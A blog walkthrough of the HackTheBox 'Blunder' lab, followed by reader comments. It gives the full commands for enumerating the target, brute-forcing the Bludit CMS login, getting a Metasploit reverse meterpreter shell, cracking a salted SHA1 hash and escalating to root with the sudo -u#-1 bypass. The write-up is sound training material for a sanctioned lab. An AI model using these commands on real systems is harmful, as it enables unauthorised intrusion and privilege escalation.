Blunder HackTheBox Walkthrough

blunder hackthebox walkthrough banner

This is Blunder HackTheBox machine walkthrough. In this walkthrough I will demonstrate you how I successfully exploited this machine and got root flag. Before starting let’s know something about Blunder machine. It is a Linux machine and is given difficulty level low by it’s maker with IP address 10.10.10.191.

Now I will show you step by step procedure how to get root flag in blunder machine.

First of all connect your PC with VPN so that you can get access to the lab and ping the IP 10.10.10.191 to make confirm that you are connected with blunder machine. I started by scanning the IP address 10.10.10.191, so that I could get some hint to start. Nmap, a port scanner gave the following results.

Scanning the Machine 

$nmap -sC -sC -oN scan 10.10.10.191

blunder hackthebox nmap port scan

Only two ports open??

Let’s perform full port scan in case there may  be services running on some other ports which is not listed in nmap’s  top 1000 ports.

After full port scan the same result appears.

$nmap -sC -sV -p- -oN full_scan 10.10.10.191

blunder hackthebox nmap full port scan

Tip: It is good idea to perform full port scan during CTF hunting or Penetration Testing because there may be chances that some port are open which don’t come under top 1000 ports of nmap.

Port 21 and 80 is shown. Apache2 web server is running on port 80. After some enumeration found website is running on Bludit CMS. And the version is 3.9.2 from this URL http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2

As usual my next step is to search if any exploit is available for given CMS. Just googled Bludit CMS 3.9.2 exploit and found this appropriate link. For more details google CVE-2019-17240. Also searchsploit give this result.

$searchsploit bludit

bludit searchsploit exploit search

There is a metasploit module present for Bludit. After opening this in metasploit I found it requires Username and Password. So we needed username and password to use this module

$msfdb run

­­msf5>search bludit

msf5>show info exploit/linux/http/bludit_upload_images_exec

Bludit CMS metasploit module for file upload

Left it here and moved forward to find some other information. Used directory brute forcing using dirsearch and wordlist directory-list-2.3-small.txt, didn’t find any interesting file. Got some hint from HTB forum about txt file so tried to FUZZ for hidden text files in the URL.

Fuzzing URL             

$wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100

Blunder hackthebox URL fuzzing

Got file todo.txt. After reading the content at http://10.10.10.191/todo.txt it appears that fergus is the user. Added it to my note. And started further enumeration.

Tip: It is a good idea to make notes of all interesting finding side by side because sometimes they show you the way how to proceed further.

todo.txt file in blunder htb

Now we have got username and we need password. Let’s make our own wordlist using cewl, a famous wordlist creator.

Creating Custom Wordlist

$cewl -d 3 -m 5 -w custom_wordlist.txt http://10.10.10.191/

custom wordlist creation using cewl in blunder hackthebox walkthrough

Modify the script at https://rastating.github.io/bludit-brute-force-mitigation-bypass/ as given below. In username use fergus because we want to brute force on user fergus and in fname use the name of custom wordlist which you have created using cewl command. In my case it is custom_wordlist.txt. Save it as poc.py and run it 

custom python script to crack password

Cracking Password

$python poc.py

Password Cracking using python script

So we have the credentials fergus : RolandDeschain . It’s time to exploit and get remote shell on our PC.

We have two ways to get shell.

1.  Either use metasploit module or

2.  Manually upload file to the website by logging in http://10.10.10.191/admin/ with creds fergus : RolandDeschain and intercept using Burp Suite to modify requests. For more info visit https://github.com/bludit/bludit/issues/1079 this link.

I preferred first because it don’t require much effort and you know well how lazy we are in doing things manually if automated things are present. 🙂

Try to use payload php/meterpreter_reverse_tcp instead of payload

php/meterpreter/reverse_tcp if later failed to get you proper meterpreter shell

Getting User Shell

$ msfdb run

msf5 > search bludit

msf5 > use exploit/linux/http/bludit_upload_images_exec

msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus

msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain

msf5 exploit(linux/http/bludit_upload_images_exec) > set payload

php/meterpreter/reverse_tcp

msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.15.87

msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

meterpreter > sysinfo

Gaining Access to Blunder Hackthebox using metasploit

Alright, we have got a meterpreter shell. Used $shell command to upgrade it to system shell and further to fully qualified Linux shell

meterpreter > shell

$which python

$python -c 'import pty;pty.spawn("/bin/bash")'

[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ export TERM=xterm-256color 

Blunder hackthebox shell upgrade form meterpreter to python shell

So we are in the Blunder HTB machine. Let us grab user flag.  Inside home directory two users hugo and shaun are present. User flag is inside hugo folder. But www-data don’t have permission to read it. Only hugo has permission to read it. Tried $su hugo in case hugo and fergus have same password but login failed possibly due to incorrect password. To access user flag we have to login with hugo. After manual enumeration found a file users.php inside the directory /var/www/bludit-3.9.2/bl-content/databases/.

blunder htb users.php file

Got password along with its salt

    Password: bfcc887f62e36ea019e3295aafb8a3885966e265

              Salt: 5dde2887e7aca

Now we have to crack this password. Hash identifier gave it is a sha1 hash.

Identify Type of Hash

hash identification using hash-identifier in blunder htb

Tried to crack using hashcat and rockyou.txt wordlist but could not crack. So tried https://cmd5.com/ site and successfully cracked the hash.

The password is Password120. So the credential is

Hugo : Password120.

Switch user to hugo

$su hugo

Password: Password120

Grab User Flag

blunder hackthebox user flag

Privilege Escalation

Let’s check what special permission does hugo has.

$sudo -l

blunder hackthebox walkthrough: Privilege escalation vector check

Tip: Whenever you get a shell try to execute $sudo -l  check what special command [*] the current user can run. And try to google ‘how to escalate privilege using [*] command’. You may get your answer easily. For example, in this case google (ALL, !root) /bin/bash

Got : User hugo may run the following commands on blunder:

      (ALL, !root) /bin/bash

After googling (ALL, !root) /bin/bash got our privilege escalation vector in first link viz. vulnerable version of sudo. See this link.

After reading the exploit PoC we can easily get our root shell in just one command. Let’s do it

Getting Root Shell

$sudo -u#-1 /bin/bash

Give the password Password120

blunder hackthebox walkthrough: Privilege escalation

Grab Root Flag

Grab the root flag from root folder

$cd /root/

$cat root.txt

blunder hackthebox root flag through walkthrough

This is how I got root to the blunder HackTheBox machine. Hope you guys have got something to learn from my approach. Have any issue and question please let me know at [email protected] and in comment section . Thanks for reading this walkthrough.

Want more walkthrough on HackTheBox always visit ethicalhacs.com.

This Post Has 10 Comments

  1. John Doe

    Please post walkthroughs for other boxes too! your website is a great help when i’m stuck somewhere.

  2. CrookBond

    hey Bro- I did pretty much everything only Password Hash cracking is giving problem because cmd5.com is chinese. I tried cmd5.org and many other sha1 decrypter but no luck. Any ideas?

  3. ghost

    Hi this cracking procedure didn’t work I tried with crackstation and cmd5.com and was not cracked, I think that is something with the salt possition.
    Could you please show us the format that you put in cmd5.com?.

    Thanks and regards,

    1. The format is sha1($Salt.$Pass) and this hash is not present on crackstation.net. There is also other hash present in
      [email protected]:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php. This hash is without salt and can be cracked easily at crackstation.net

  4. someone

    Hey! Thanks for the walkthrough. Can you please explain “sudo -u#-1 /bin/bash”. Or give any resources.

  5. spo

    Hi, I am currently slightly stuck on on the meterpreter shell upgrade to system shell. I tried different payloads and still not able to proceed further. Only getting this:
    meterpreter > shell
    Process 2740 created.
    Channel 0 created.
    ^[[A

    any idea?

    Thank you.

    1. I think when a new channel is created means you have a shell session open and you can interact with this session using normal commands. You may either get a shell prompt or not after running shell command on meterpreter but normal Linux command should always works in a typical shell session created by meterpreter, which is in the above case. Try to run some basic Linux command like whoami, id, ls, etc. to confirm whether you are able to run command or not. If you get output from the command then use python -c ‘import pty;pty.spawn(“/bin/bash”)’ to upgrade the shell to shell prompt.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.